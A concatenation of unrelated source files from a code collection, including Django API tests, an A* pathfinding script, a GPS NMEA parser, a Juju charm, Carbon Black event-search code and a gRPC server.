alg_dict = {"KNN": KNeighborsRegressor(),
"DecisionTree": DecisionTreeRegressor(),
# "Linear": LinearRegression(),
# "Ridge": Ridge(),
# "Lasso": Lasso()
}
for response in response_list:
for features in features_list:
result.write("features:,")
for feat in features:
result.write(feat + ',')
result.write('\n')
result.write("response:," + response + '\n')
result.write(" ,KNN,DecisionTree,Linear,Ridge,Lasso\n")
for company in company_list:
total_df = pd.read_csv("./processed_data/{0}.csv".format(company))
x_train, x_test, y_train, y_test = train_test_split(total_df[features].to_numpy(),
total_df[response].to_numpy(dtype=np.float32),
test_size=0.3,
shuffle=True,
random_state=500)
result.write(company + ',')
for alg_name, reg in alg_dict.items():
print(alg_name)
print(features)
print(response)
Rsquared_score = regressor_run(reg, alg_name, x_train, x_test, y_train, y_test)
result.write(str(Rsquared_score))
result.write(',')
result.write('\n')
            result.write('\n')
            break  # stop after the first company
        result.write('\n')
        break  # stop after the first feature set
result.write('\n')
result.close()
|
the-stack_0_19915 | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""test that login is required for tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""test the authorized user tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'[email protected]',
'password123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""test that tags are returned for the authenticated user"""
user2 = get_user_model().objects.create_user(
'[email protected]',
'testpass'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='comfy food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
    def test_create_tag_successful(self):
        """test creating a new tag"""
        payload = {'name': 'Test tag'}
        self.client.post(TAGS_URL, payload)
        exists = Tag.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertTrue(exists)
def test_create_tag_invalid(self):
"""test creating a new tag with invalid payload"""
        payload = {'name': ''}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
|
the-stack_0_19916 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for data_provider."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
import data_provider
class DataProviderTest(tf.test.TestCase):
def _test_data_provider_helper(self, split_name):
dataset_dir = os.path.join(
tf.flags.FLAGS.test_srcdir,
'google3/third_party/tensorflow_models/gan/image_compression/testdata/')
batch_size = 3
patch_size = 8
images = data_provider.provide_data(
split_name, batch_size, dataset_dir, patch_size=8)
self.assertListEqual([batch_size, patch_size, patch_size, 3],
images.shape.as_list())
with self.test_session(use_gpu=True) as sess:
with tf.contrib.slim.queues.QueueRunners(sess):
images_out = sess.run(images)
self.assertEqual((batch_size, patch_size, patch_size, 3),
images_out.shape)
# Check range.
self.assertTrue(np.all(np.abs(images_out) <= 1.0))
def test_data_provider_train(self):
self._test_data_provider_helper('train')
def test_data_provider_validation(self):
self._test_data_provider_helper('validation')
if __name__ == '__main__':
tf.test.main()
|
the-stack_0_19917 | import heapq
import numpy as np
TPos = tuple[int, int]
class PriorityQueue:
def __init__(self):
self.elements = []
self.set = set()
def minkey(self):
if not self.empty():
return self.elements[0][0]
else:
return float("inf")
def empty(self):
return len(self.elements) == 0
def put(self, item, priority):
if item not in self.set:
heapq.heappush(self.elements, (priority, item))
self.set.add(item)
else:
# update
# print("update", item)
temp = []
(pri, x) = heapq.heappop(self.elements)
while x != item:
temp.append((pri, x))
(pri, x) = heapq.heappop(self.elements)
temp.append((priority, item))
for (pro, xxx) in temp:
heapq.heappush(self.elements, (pro, xxx))
def remove_element(self, item):
if item in self.set:
self.set.remove(item)
temp = []
(pro, x) = heapq.heappop(self.elements)
while x != item:
temp.append((pro, x))
(pro, x) = heapq.heappop(self.elements)
for (prito, yyy) in temp:
heapq.heappush(self.elements, (prito, yyy))
def top_show(self):
return self.elements[0][1]
def get(self):
(priority, item) = heapq.heappop(self.elements)
self.set.remove(item)
return (priority, item)
def consistent_heuristic(P: TPos, goal: TPos):
# euclidean distance
a = np.array(P)
b = np.array(goal)
return np.linalg.norm(a - b)
def heuristic_2(P: TPos, goal: TPos):
# integer division by time variable
return consistent_heuristic(P, goal) // t
def heuristic_1(P: TPos, goal: TPos):
# manhattan distance
return abs(P[0] - goal[0]) + abs(P[1] - goal[1])
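# Illustrative values for the two point heuristics, from (0, 0) to (3, 4):
#   consistent_heuristic((0, 0), (3, 4)) -> 5.0  (euclidean, 3-4-5 triangle)
#   heuristic_1((0, 0), (3, 4))          -> 7    (manhattan)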
def key(start: TPos, i: int, goal: TPos, g_function: dict[TPos, float]):
ans = g_function[start] + W1 * heuristics[i](start, goal)
return ans
def do_something(back_pointer, goal, start):
grid = np.chararray((n, n))
for i in range(n):
for j in range(n):
grid[i][j] = "*"
for i in range(n):
for j in range(n):
if (j, (n - 1) - i) in blocks:
grid[i][j] = "#"
grid[0][(n - 1)] = "-"
x = back_pointer[goal]
while x != start:
(x_c, y_c) = x
# print(x)
grid[(n - 1) - y_c][x_c] = "-"
x = back_pointer[x]
grid[(n - 1)][0] = "-"
for i in range(n):
for j in range(n):
if (i, j) == (0, n - 1):
print(grid[i][j], end=" ")
print("<-- End position", end=" ")
else:
print(grid[i][j], end=" ")
print()
print("^")
print("Start position")
print()
print("# is an obstacle")
print("- is the path taken by algorithm")
print("PATH TAKEN BY THE ALGORITHM IS:-")
x = back_pointer[goal]
while x != start:
print(x, end=" ")
x = back_pointer[x]
print(x)
quit()
def valid(p: TPos):
if p[0] < 0 or p[0] > n - 1:
return False
if p[1] < 0 or p[1] > n - 1:
return False
return True
def expand_state(
s,
j,
visited,
g_function,
close_list_anchor,
close_list_inad,
open_list,
back_pointer,
):
for itera in range(n_heuristic):
open_list[itera].remove_element(s)
# print("s", s)
# print("j", j)
(x, y) = s
left = (x - 1, y)
right = (x + 1, y)
up = (x, y + 1)
down = (x, y - 1)
for neighbours in [left, right, up, down]:
if neighbours not in blocks:
if valid(neighbours) and neighbours not in visited:
# print("neighbour", neighbours)
visited.add(neighbours)
back_pointer[neighbours] = -1
g_function[neighbours] = float("inf")
if valid(neighbours) and g_function[neighbours] > g_function[s] + 1:
g_function[neighbours] = g_function[s] + 1
back_pointer[neighbours] = s
if neighbours not in close_list_anchor:
open_list[0].put(neighbours, key(neighbours, 0, goal, g_function))
if neighbours not in close_list_inad:
for var in range(1, n_heuristic):
if key(neighbours, var, goal, g_function) <= W2 * key(
neighbours, 0, goal, g_function
):
open_list[j].put(
neighbours, key(neighbours, var, goal, g_function)
)
def make_common_ground():
some_list = []
for x in range(1, 5):
for y in range(1, 6):
some_list.append((x, y))
for x in range(15, 20):
some_list.append((x, 17))
for x in range(10, 19):
for y in range(1, 15):
some_list.append((x, y))
# L block
for x in range(1, 4):
for y in range(12, 19):
some_list.append((x, y))
for x in range(3, 13):
for y in range(16, 19):
some_list.append((x, y))
return some_list
heuristics = {0: consistent_heuristic, 1: heuristic_1, 2: heuristic_2}
blocks_blk = [
(0, 1),
(1, 1),
(2, 1),
(3, 1),
(4, 1),
(5, 1),
(6, 1),
(7, 1),
(8, 1),
(9, 1),
(10, 1),
(11, 1),
(12, 1),
(13, 1),
(14, 1),
(15, 1),
(16, 1),
(17, 1),
(18, 1),
(19, 1),
]
blocks_all = make_common_ground()
blocks = blocks_blk
# hyper parameters
W1 = 1
W2 = 1
n = 20
n_heuristic = 3 # one consistent and two other inconsistent
# start and end destination
start = (0, 0)
goal = (n - 1, n - 1)
t = 1
def multi_a_star(start: TPos, goal: TPos, n_heuristic: int):
g_function = {start: 0, goal: float("inf")}
back_pointer = {start: -1, goal: -1}
open_list = []
visited = set()
for i in range(n_heuristic):
open_list.append(PriorityQueue())
open_list[i].put(start, key(start, i, goal, g_function))
close_list_anchor: list[int] = []
close_list_inad: list[int] = []
while open_list[0].minkey() < float("inf"):
for i in range(1, n_heuristic):
# print(open_list[0].minkey(), open_list[i].minkey())
if open_list[i].minkey() <= W2 * open_list[0].minkey():
global t
t += 1
if g_function[goal] <= open_list[i].minkey():
if g_function[goal] < float("inf"):
do_something(back_pointer, goal, start)
else:
                    get_s = open_list[i].top_show()
visited.add(get_s)
expand_state(
get_s,
i,
visited,
g_function,
close_list_anchor,
close_list_inad,
open_list,
back_pointer,
)
close_list_inad.append(get_s)
else:
if g_function[goal] <= open_list[0].minkey():
if g_function[goal] < float("inf"):
do_something(back_pointer, goal, start)
else:
get_s = open_list[0].top_show()
visited.add(get_s)
expand_state(
get_s,
0,
visited,
g_function,
close_list_anchor,
close_list_inad,
open_list,
back_pointer,
)
close_list_anchor.append(get_s)
print("No path found to goal")
print()
for i in range(n - 1, -1, -1):
for j in range(n):
if (j, i) in blocks:
print("#", end=" ")
elif (j, i) in back_pointer:
if (j, i) == (n - 1, n - 1):
print("*", end=" ")
else:
print("-", end=" ")
else:
print("*", end=" ")
if (j, i) == (n - 1, n - 1):
print("<-- End position", end=" ")
print()
print("^")
print("Start position")
print()
print("# is an obstacle")
print("- is the path taken by algorithm")
if __name__ == "__main__":
multi_a_star(start, goal, n_heuristic)
|
the-stack_0_19918 | """Send events via uds
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import socket
import time
from treadmill import osnoop
_LOGGER = logging.getLogger(__name__)
@osnoop.windows
def post_ipc(event, uds='/run/tm_ctl/appevents'):
"""Post events to UCSPI socket
Most use case is to send container event from inside container
"""
_LOGGER.debug('post: %s: %r', uds, event)
(
_ts,
_src,
instanceid,
event_type,
event_data,
_payload
) = event.to_data()
event_str = '{},{},{},{}'.format(
time.time(), instanceid, event_type, event_data
).encode()
sent = 0
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as u_sock:
try:
u_sock.connect(uds)
u_sock.sendall(event_str)
sent = len(event_str)
except ConnectionRefusedError:
_LOGGER.error('unable to connect %s', uds)
except Exception as err: # pylint: disable=broad-except
_LOGGER.error('error to send event %s: %r', event_str, err)
return sent
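# Illustrative wire format written to the socket, matching the format string above
# (hypothetical field values):
#   b'<timestamp>,<instanceid>,<event_type>,<event_data>'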
|
the-stack_0_19922 | # Copyright 2020 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=unused-argument
from charms.reactive import when, when_not, set_state, remove_state
from charmhelpers.core import hookenv
from charms.layer.magpie_tools import check_nodes, safe_status, Iperf, Lldp
import charmhelpers.contrib.openstack.utils as os_utils
import charmhelpers.fetch as fetch
def _set_states(check_result):
if 'fail' in check_result['icmp']:
set_state('magpie-icmp.failed')
else:
remove_state('magpie-icmp.failed')
if 'fail' in check_result['dns']:
set_state('magpie-dns.failed')
else:
remove_state('magpie-dns.failed')
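# Illustrative inputs (result shape assumed from how check_nodes is used below):
#   _set_states({'icmp': 'icmp ok', 'dns': 'dns ok'})    # clears both failed states
#   _set_states({'icmp': 'icmp fail', 'dns': 'dns ok'})  # sets magpie-icmp.failed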
@when_not('charm.installed')
def install():
"""Configure APT source.
The many permutations of package source syntaxes in use does not allow us
to simply call `add-apt-repository` on the unit and we need to make use
of `charmhelpers.fetch.add_source` for this to be universally useful.
"""
source, key = os_utils.get_source_and_pgp_key(
hookenv.config().get('source', 'distro'))
fetch.add_source(source, key)
fetch.apt_update(fatal=True)
set_state('charm.installed')
@when('charm.installed')
@when_not('lldp.installed')
def install_lldp_pkg():
if hookenv.config().get('use_lldp'):
lldp = Lldp()
lldp.install()
lldp.enable()
set_state('lldp.installed')
@when('charm.installed')
@when_not('iperf.installed')
def install_iperf_pkg():
if hookenv.config().get('check_iperf'):
iperf = Iperf()
iperf.install_iperf()
set_state('iperf.installed')
@when_not('magpie.joined')
def no_peers():
safe_status('waiting', 'Waiting for peers...')
@when('magpie.joined')
@when_not('leadership.is_leader', 'iperf.checked')
def check_check_state(magpie):
'''
Servers should only update their status after iperf has checked them
'''
if magpie.get_iperf_checked():
for units in magpie.get_iperf_checked():
if units and hookenv.local_unit() in units:
set_state('iperf.checked')
@when('magpie.joined', 'leadership.is_leader')
@when_not('iperf.servers.ready')
def leader_wait_servers_ready(magpie):
'''
Don't do any iperf checks until the servers are listening
'''
nodes = sorted(magpie.get_nodes())
iperf_ready_nodes = sorted(magpie.check_ready_iperf_servers())
if nodes == iperf_ready_nodes:
set_state('iperf.servers.ready')
else:
remove_state('iperf.servers.ready')
@when('magpie.joined')
@when_not('leadership.is_leader', 'iperf.listening')
def listen_for_checks(magpie):
'''
If im not the leader, and im not listening, then listen
'''
iperf = Iperf()
iperf.listen()
magpie.set_iperf_server_ready()
set_state('iperf.listening')
@when('iperf.servers.ready', 'magpie.joined', 'leadership.is_leader')
def client_check_hosts(magpie):
'''
Once the iperf servers are listening, do the checks
'''
nodes = magpie.get_nodes()
_set_states(check_nodes(nodes, iperf_client=True))
magpie.set_iperf_checked()
@when('magpie.joined', 'iperf.checked')
@when_not('leadership.is_leader')
def check_all_node(magpie):
'''
Now that the iperf checks have been done, we can update our status
'''
nodes = magpie.get_nodes()
_set_states(check_nodes(nodes))
@when('prometheus-target.available')
def advertise_metric_port(target):
'''
Advertise prometheus metric port used during action execution
'''
target.configure(port="8088")
|
the-stack_0_19923 | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
from unittest import TestCase
from sardana.sardanabuffer import SardanaBuffer
class TestPersistentBuffer(TestCase):
"""Unit tests for Buffer class"""
def setUp(self):
self.buffer = SardanaBuffer(persistent=True)
self.buffer.extend([1, 2, 3])
def test_extend(self):
"""Test extend method with a simple case of a list."""
chunk = [4, 5, 6]
self.buffer.extend(chunk)
self.assertEqual(self.buffer.get_value(0), 1)
self.assertEqual(self.buffer.get_value(5), 6)
self.assertEqual(len(self.buffer), 6)
self.assertEqual(len(self.buffer.last_chunk), 3)
def test_append(self):
"""Test if append correctly fills the last_chunk as well as permanently
adds the value to the buffer.
"""
self.buffer.append(1)
self.assertEqual(len(self.buffer), 4)
self.assertEqual(len(self.buffer.last_chunk), 1)
|
the-stack_0_19924 | from modules.file.Extension import Extension
def test_check_arguments():
ext = Extension()
ext.args = ['', 'db', 'sqlite', 'sqlite3']
assert ext.check()
assert ext.check_arguments()
ext.args = None
try:
ext.check_arguments()
except SystemExit:
assert True
def test_dict_values():
ext = Extension()
ext.args = ['', 'db']
assert len(ext.description()) > 0
assert ext.is_filter_files()
assert not ext.is_collect_data()
assert not ext.is_extract_data()
def test_filter_files():
ext = Extension()
ext.args = ['']
files = [
'./tests/modules/file/extension_mocks/database.sqlite',
'./tests/modules/file/extension_mocks/database2.db',
'./tests/modules/file/extension_mocks/noextfile',
'./tests/modules/file/extension_mocks/some.jpg'
]
ext.files = files
ext.do_filter_files()
assert len(ext.files) == 1
ext.files = files
ext.args = ['', 'db', 'jpg']
ext.do_filter_files()
assert len(ext.files) == 3
|
the-stack_0_19926 | from machine import Timer
import time
import gc
import binascii
import pycom
class L76GNSS:
GPS_I2CADDR = const(0x10)
def __init__(self, pytrack=None, sda='P22', scl='P21', timeout=None):
if pytrack is not None:
self.i2c = pytrack.i2c
else:
from machine import I2C
self.i2c = I2C(0, mode=I2C.MASTER, pins=(sda, scl))
self.chrono = Timer.Chrono()
self.timeout = timeout
self.timeout_status = True
self.reg = bytearray(1)
self.i2c.writeto(GPS_I2CADDR, self.reg)
def _read(self):
self.reg = self.i2c.readfrom(GPS_I2CADDR, 128) #Changed from 64 to 128 - I2C L76 says it can read till 255 bytes
return self.reg
def _convert_coords(self, gngll_s):
lat = gngll_s[1]
lat_d = (float(lat) // 100) + ((float(lat) % 100) / 60)
lon = gngll_s[3]
lon_d = (float(lon) // 100) + ((float(lon) % 100) / 60)
if gngll_s[2] == 'S':
lat_d *= -1
if gngll_s[4] == 'W':
lon_d *= -1
return(lat_d, lon_d)
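    # Illustrative NMEA-to-decimal conversion (sentence fields assumed):
    #   ['GNGLL', '4807.038', 'N', '01131.000', 'E', ...] -> (48.1173, 11.516666...)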
#diff indexes from original - Using GGA sentence
def _convert_coords1(self, gngga_s):
lat = gngga_s[2]
lat_d = (float(lat) // 100) + ((float(lat) % 100) / 60)
lon = gngga_s[4]
lon_d = (float(lon) // 100) + ((float(lon) % 100) / 60)
if gngga_s[3] == 'S':
lat_d *= -1
if gngga_s[5] == 'W':
lon_d *= -1
return(lat_d, lon_d)
def _get_time(self, gngga_s):
gps_time = gngga_s[1]
return(gps_time)
def _get_altitude(self, gngga_s):
gps_altitude = gngga_s[9]
return(gps_altitude)
def _get_satellites(self, gngga_s):
num_satellites = gngga_s[7]
return(num_satellites)
def _fix_quality(self, gngga_s):
valid = gngga_s[6]
if valid == '1':
return True
else:
return False
#Using RMC sentence
def _get_time_rmc(self, gnrmc_s):
gps_time = gnrmc_s[1]
return(gps_time)
def _data_valid_rmc(self, gnrmc_s):
valid = gnrmc_s[2]
if valid == 'A':
return True
else:
return False
def _get_date_rmc(self, gnrmc_s):
gps_date = gnrmc_s[9]
return(gps_date)
def coordinates(self, debug=False):
lat_d, lon_d, debug_timeout = None, None, False
if self.timeout is not None:
self.chrono.reset()
self.chrono.start()
nmea = b''
while True:
if self.timeout is not None and self.chrono.read() >= self.timeout:
self.chrono.stop()
chrono_timeout = self.chrono.read()
self.chrono.reset()
self.timeout_status = False
debug_timeout = True
if not self.timeout_status:
gc.collect()
break
nmea += self._read().lstrip(b'\n\n').rstrip(b'\n\n')
gngll_idx = nmea.find(b'GNGLL')
if gngll_idx >= 0:
gngll = nmea[gngll_idx:]
e_idx = gngll.find(b'\r\n')
if e_idx >= 0:
try:
gngll = gngll[:e_idx].decode('ascii')
gngll_s = gngll.split(',')
lat_d, lon_d = self._convert_coords(gngll_s)
except Exception:
pass
finally:
nmea = nmea[(gngll_idx + e_idx):]
gc.collect()
break
else:
gc.collect()
if len(nmea) > 410: # i suppose it can be safely changed to 82, which is longest NMEA frame
nmea = nmea[-5:] # $GNGL without last L
time.sleep(0.1)
self.timeout_status = True
if debug and debug_timeout:
print('GPS timed out after %f seconds' % (chrono_timeout))
return(None, None)
else:
return(lat_d, lon_d)
#TEST functions
#Parser for GPGGA
def coordinates1(self, debug=False):
lat_d, lon_d, gps_time, valid, gps_altitude, num_satellites, debug_timeout = None, None, None, None, None, False, False
if self.timeout is not None:
self.chrono.reset()
self.chrono.start()
nmea = b''
while True:
if self.timeout is not None and self.chrono.read() >= self.timeout:
self.chrono.stop()
chrono_timeout = self.chrono.read()
self.chrono.reset()
self.timeout_status = False
debug_timeout = True
if not self.timeout_status:
gc.collect()
break
nmea += self._read().lstrip(b'\n\n').rstrip(b'\n\n')
gpgga_idx = nmea.find(b'GPGGA')
if gpgga_idx >= 0:
gpgga = nmea[gpgga_idx:]
gpgga_e_idx = gpgga.find(b'\r\n')
if gpgga_e_idx >= 0:
try:
gpgga = gpgga[:gpgga_e_idx].decode('ascii')
gpgga_s = gpgga.split(',')
lat_d, lon_d = self._convert_coords1(gpgga_s)
gps_time = self._get_time(gpgga_s)
valid = self._fix_quality(gpgga_s)
gps_altitude = self._get_altitude(gpgga_s)
num_satellites = self._get_satellites(gpgga_s)
except Exception:
pass
finally:
nmea = nmea[(gpgga_idx + gpgga_e_idx):]
gc.collect()
break
else:
gc.collect()
if len(nmea) > 410: # i suppose it can be safely changed to 82, which is longest NMEA frame
nmea = nmea[-5:] # $GNGL without last L
time.sleep(0.1)
self.timeout_status = True
if debug and debug_timeout:
print('GPS timed out after %f seconds' % (chrono_timeout))
return(None, None, None, None, False, None)
else:
return(lat_d, lon_d, gps_time, gps_altitude, valid, num_satellites)
def stop(self,pytrack):
ANSELC_ADDR = const(0x18E)
pytrack.poke_memory(ANSELC_ADDR, ~(1 << 7))
#parser for UTC time and date >> Reads GPRMC
def get_datetime(self, debug=True):
lat_d, lon_d, gps_time, valid, gps_date, rmc_idx, debug_timeout = None, None, None, None, None, -1, False
if self.timeout is not None:
self.chrono.reset()
self.chrono.start()
nmea = b''
while True:
if self.timeout is not None and self.chrono.read() >= self.timeout:
self.chrono.stop()
chrono_timeout = self.chrono.read()
self.chrono.reset()
self.timeout_status = False
debug_timeout = True
if not self.timeout_status:
gc.collect()
break
nmea += self._read().lstrip(b'\n\n').rstrip(b'\n\n')
#Since or spg or glonass could give date see which one is present -SEE page 10 GNSS protocol
#GPS only - GPRMC GPGGA
#Glonass only - GNRMC GPGGA
#GPS+GLON - GNRMC GPGGA
#No station - GPRMC GPGGA
gprmc_idx = nmea.find(b'GPRMC')
gnrmc_idx = nmea.find(b'GNRMC')
if gprmc_idx >= 0:
rmc_idx = gprmc_idx
if gnrmc_idx >= 0:
rmc_idx = gnrmc_idx
if rmc_idx >= 0:
rmc = nmea[rmc_idx:]
rmc_e_idx = rmc.find(b'\r\n')
if rmc_e_idx >= 0:
print(nmea)
try:
rmc = rmc[:rmc_e_idx].decode('ascii')
rmc_s = rmc.split(',')
lat_d, lon_d = self._convert_coords1(rmc_s[1:])
gps_time = self._get_time_rmc(rmc_s)
valid = self._data_valid_rmc(rmc_s)
gps_date = self._get_date_rmc(rmc_s)
except Exception:
pass
finally:
nmea = nmea[(rmc_idx + rmc_e_idx):]
gc.collect()
break
else:
gc.collect()
if len(nmea) > 512: # i suppose it can be safely changed to 82, which is longest NMEA frame --CHANGED to 512
nmea = nmea[-5:] # $GNGL without last L
time.sleep(0.1)
self.timeout_status = True
if debug and debug_timeout:
print('GPS timed out after %f seconds' % (chrono_timeout))
return(None, None, None, False, None)
else:
return(lat_d, lon_d, gps_time, valid, gps_date)
|
the-stack_0_19927 | # add global variable for report server or not to all templates so we can hide
# elements that aren't wanted on the report server
from django.conf import settings
def report_server_check(request):
return {'report_server': settings.REPORT_SERVER,
'offline_mode': settings.OFFLINE_MODE,
'non_ldap': settings.NON_LDAP}
def google_analytics(request):
"""
Use the variables returned in this function to render Google Analytics
Tracking Code template.
"""
ga_prop_id = getattr(settings, 'GOOGLE_ANALYTICS_PROPERTY_ID', False)
ga_domain = getattr(settings, 'GOOGLE_ANALYTICS_DOMAIN', False)
if not settings.DEBUG and ga_prop_id and ga_domain:
return {
'GOOGLE_ANALYTICS_PROPERTY_ID': ga_prop_id,
'GOOGLE_ANALYTICS_DOMAIN': ga_domain,
}
return {}
|
the-stack_0_19928 | # Take in user input to search across existing enriched events.
# Prints device info
# Next, print 5 most recent alert IDs/info
from cbc_sdk import CBCloudAPI
from cbc_sdk.platform import Device
from cbc_sdk.endpoint_standard import EnrichedEvent
#Start by taking input to select a device.
keyword = ""
keyword = input("Please enter a TTP, or other keyword to begin: ")
cbc_api = CBCloudAPI(profile='default')
enriched_search = cbc_api.select(EnrichedEvent)
# Get keyword to filter enriched events
while keyword == "":
keyword = input("Save the blank searches for the console :) Enter a TTP or other keyword to begin: ")
enriched_search = enriched_search.where(keyword)
if len(enriched_search) == 0:
print("Welp, that one came up empty. Try again.")
exit()
active_devices = []
# get list of devices that reported enriched events
for event in enriched_search:
if event['device_name'] not in active_devices:
active_devices.append(event['device_name'])
print("## Devices with matching enriched events ##")
for dev in active_devices:
print("Device name: {}".format(str(dev)))
# Print list of devices with reported evnts
print("\n## Sample of matching enriched events ##\n")
print("{} results returned".format(len(enriched_search)))
# print up to two sample events from the search results
sample_result_count = 0
for event in enriched_search:
    if sample_result_count > 1:
        break
    print("\n")
    print(type(event))
    print(str(event))
    sample_result_count = sample_result_count + 1
|
the-stack_0_19929 | # -*- coding: utf-8 -*-
"""Utilities for working with Markdoc configurations."""
import copy
import os
import os.path as p
import markdown
import yaml
import markdoc.exc
class ConfigNotFound(markdoc.exc.AbortError):
"""The configuration file was not found."""
pass
class ConfigMeta(type):
def __new__(mcls, name, bases, attrs):
cls = type.__new__(mcls, name, bases, attrs)
cls._defaults = {}
cls._func_defaults = {}
return cls
def register_default(cls, key, default_value):
"""Register a default value for a given key."""
cls._defaults[key] = default_value
def register_func_default(cls, key, function):
"""Register a callable as a functional default for a key."""
cls._func_defaults[key] = function
def func_default_for(cls, key):
"""Decorator to define a functional default for a given key."""
return lambda function: [cls.register_func_default(key, function),
function][1]
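# Illustrative functional default (hypothetical key and rule):
#   @Config.func_default_for('wiki-name')
#   def default_wiki_name(config, key):
#       return p.basename(config['meta.root'])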
class Config(dict):
"""
A dictionary which represents a single wiki's Markdoc configuration.
When instantiating this dictionary, if you aren't using an actual
configuration file, just remember to set `config['meta.root']` to the
wiki root; you can use `None` as the value for config_file. For example:
# With a filename:
config = Config('filename.yaml', {...})
# Without a filename:
config = Config(None, {'meta': {'root': '/path/to/wiki/root/'}, ...})
"""
__metaclass__ = ConfigMeta
def __init__(self, config_file, config):
super(Config, self).__init__(flatten(config))
self['meta.config-file'] = config_file
self['meta.root'] = p.dirname(config_file)
def __getitem__(self, key):
try:
return dict.__getitem__(self, key)
except KeyError:
if key in self._defaults:
self[key] = copy.copy(self._defaults[key])
elif key in self._func_defaults:
self[key] = self._func_defaults[key](self, key)
else:
raise
return dict.__getitem__(self, key)
def __delitem__(self, key):
if (key not in self):
return # fail silently.
return dict.__delitem__(self, key)
@classmethod
def for_directory(cls, directory=None):
"""
Get the configuration from the 'markdoc.yaml' file in a directory.
If you do not specify a directory, this method will use the current
working directory.
"""
if directory is None:
directory = os.getcwd()
if p.exists(p.join(directory, 'markdoc.yaml')):
return cls.for_file(p.join(directory, 'markdoc.yaml'))
elif p.exists(p.join(directory, '.markdoc.yaml')):
return cls.for_file(p.join(directory, '.markdoc.yaml'))
raise ConfigNotFound("A markdoc configuration could not be found.")
@classmethod
def for_file(cls, filename):
"""Get the configuration from a given YAML file."""
if not p.exists(filename):
relpath = p.relpath(p.dirname(filename), start=os.getcwd())
basename = p.basename(filename)
if relpath == '.':
raise ConfigNotFound("%s was not found in the current directory" % basename)
raise ConfigNotFound("%s was not found in %s" % (basename, relpath))
        fp = open(filename)
        try:
            # `safe_load` builds only plain Python data structures, which is
            # all a configuration mapping needs.
            config = yaml.safe_load(fp) or {}
        finally:
            fp.close()
return cls(filename, config)
def flatten(dictionary, prefix=''):
"""
Flatten nested dictionaries into dotted keys.
>>> d = {
... 'a': {
... 'b': 1,
... 'c': {
... 'd': 2,
... 'e': {
... 'f': 3
... }
... }
... },
... 'g': 4,
... }
>>> sorted(flatten(d).items())
[('a.b', 1), ('a.c.d', 2), ('a.c.e.f', 3), ('g', 4)]
"""
    for key in dictionary.keys():
        value = dictionary.pop(key)
        if not isinstance(value, dict):
            dictionary[prefix + key] = value
        else:
            # Recurse into nested dictionaries, extending the dotted prefix.
            dictionary.update(flatten(value, prefix=(prefix + key + '.')))
return dictionary
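# A minimal usage sketch (hypothetical keys, shown for illustration only):
# register a static default and a functional default, then read them back.
#
#     Config.register_default('wiki-name', 'My Wiki')
#
#     @Config.func_default_for('html-dir')
#     def default_html_dir(config, key):
#         return p.join(config['meta.root'], '.html')
#
#     config = Config(None, {'meta': {'root': '/path/to/wiki'}})
#     config['wiki-name']  # => 'My Wiki'
#     config['html-dir']   # => '/path/to/wiki/.html'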
|
the-stack_0_19930 | import grpc
from concurrent import futures
import time
from pkg.api.python import api_pb2_grpc
from pkg.suggestion.bayesian_service import BayesianService
from pkg.suggestion.types import DEFAULT_PORT
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
api_pb2_grpc.add_SuggestionServicer_to_server(BayesianService(), server)
server.add_insecure_port(DEFAULT_PORT)
print("Listening...")
server.start()
try:
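        # server.start() does not block, so keep the main thread alive until
        # the process is interrupted.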
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
server.stop(0)
if __name__ == "__main__":
serve()
